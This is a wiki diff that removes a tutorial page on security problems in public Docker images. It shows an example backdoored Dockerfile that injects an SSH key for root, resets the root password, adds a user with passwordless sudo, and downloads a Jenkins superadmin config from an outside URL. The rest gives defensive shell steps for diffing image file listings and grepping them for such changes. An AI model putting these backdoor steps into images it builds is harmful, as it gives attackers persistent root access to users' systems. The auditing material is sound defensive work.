Differences

This shows you the differences between two versions of the page.

--- ubuntu:docker:common_security_issues_inside_public_docker_images [2019/11/27 00:57] – peter
+++ ubuntu:docker:common_security_issues_inside_public_docker_images [2020/04/16 08:07] (current) – removed peter
@@ Line 1: / Line 1: @@
-====== Ubuntu - Docker - Common Security Issues Inside Public Docker Images ======
-===== Common Security Issues Inside Public Docker Images =====
-Here is a simple example.  Doubtless it will misleading and hard to diagnose in real world.
-  * In L18-19, a ssh key is injected to to authorized_keys. If you start sshd, you’re in danger.
-  * In L22, root password has been reset. Not good, isn’t it?
-  * In L25-26, a malicious OS user has been added.
-  * In L29-31, the user has been promoted as super admin, and he/she can run any commands without password!
-  * In L34-36, your jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So do the hackers! This case represents security of application layer. It’s certainly the most dangerous and difficult case.
-<code bash>
- ########## How To Use Docker Image ###############
- ##
- ##  Install docker utility
- ##  Download docker image:
- ##   docker pull denny/test:v1
- ##  Boot docker container:
- ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash
- ##
- ##  Build Image From Dockerfile.
- ##   docker build -f Dockerfile -t denny/test:v1 --rm=false .
- ##################################################
- FROM ubuntu:14.04
- MAINTAINER Denny <denny@dennyzhang.com>
- RUN mkdir -p /root/.ssh && \
-   # SSH login by key file
-   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
-        >> /root/.ssh/authorized_keys && \
-   # Reset root password
-   echo 'root:ChangeMe1' | chpasswd && \
-   # Add a malicious user
-   useradd denny && \
-   echo 'denny:ChangeMe1' | chpasswd && \
-   # Add user to super admin
-   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
-         /etc/sudoers.d/admins && \
-   chmod 400 /etc/sudoers.d/admins && \
-   # Add superadmin user to
-   mkdir -p /var/lib/jenkins/users/superadmin && \
-   wget -O /var/lib/jenkins/users/superadmin/config.xml \
-     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml
- CMD ["/bin/bash"]
-</code>
-----
-===== Dump Change List Of Docker Images =====
-Apparently we still want to use community docker images.  Just need to rule out insecure ones.  Also audit potential security risks as many as possible.  Docker images are built directly or indirectly from golden images provided by trusted sources.  Original golden docker images are usually clean.  So literally speaking, what changes community docker images have made?
-People can inspect change of docker containers by :
-<code bash>
-docker diff $container_id
-</code>
-Unfortunately docker doesn’t support images comparison.  Here is a feasible workaround:
-----
-==== List all files in golden image like below. ====
-<code bash>
-container_name="container1"
-docker_image="ubuntu:14.04"
-result_list="/tmp/list1.txt"
-docker stop $container_name; \
- docker rm $container_name || true
-# Start a container from golden image
-docker run -t --name $container_name \
- -d $docker_image /bin/bash
-# List all files inside the container
-docker export $container_name | \
-  docker run -i --rm ubuntu tar tvf - \
-  > $result_list
-# Check the list
-tail $result_list
-# drwxr-xr-x 0/0      0   2016-08-02 08:26 bin/
-# -rwxr-xr-x 0/0  21112   2014-10-07 19:22 bin/bash
-# -rwxr-xr-x 0/0  31152   2013-10-21 13:15 bin/bunzip2
-# lrwxrwxrwx 0/0      0   2013-10-21 13:15 bin/bzcmp -> bzdiff
-# -rwxr-xr-x 0/0   2140   2013-10-21 13:15 bin/bzdiff
-# ...
-</code>
-List all files in problematic image.  Note it might take tens of minutes for large images.
-<code bash>
-container_name="container2"
-docker_image="denny/gitlab:v1"
-result_list="/tmp/list2.txt"
-docker stop $container_name; \
- docker rm $container_name || true
-# Start a container from golden image
-docker run -t --name $container_name \
- -d $docker_image /bin/bash
-# List all files inside the container
-docker export $container_name | \
-  docker run -i --rm ubuntu tar tvf - \
-  > $result_list
-# Check the list
-tail $result_list
-</code>
-----
-==== Compare Two list ====
-<code bash>
-result1="/tmp/list1.txt"
-result2="/tmp/list2.txt"
-diff_result="/tmp/diff.txt"
-diff $result1 $result2 > $diff_result
-tail $diff_result
-# > drwxr-xr-x 0/0     0  2015-12-20 13:34 var/spool/postfix/pid/
-# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/private/
-# > drwx--s--- 103/0   0  2015-12-20 13:34 var/spool/postfix/public/
-# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/saved/
-</code>
-----
-==== Check for security vulnerability ====
-<code bash>
-diff_result="/tmp/diff.txt"
-# Check ssh authorized login
-grep authorized_keys $diff_result
-# check OS users
-grep "etc/group" $diff_result
-# Check sudo users
-grep "etc/sudoers.d" $diff_result
-# Check ssh key pair
-grep ".ssh/.*id_rsa" $diff_result
-# Add your checks in below
-# ...
-# ...
-</code>
-After the test, remember to remove useless containers.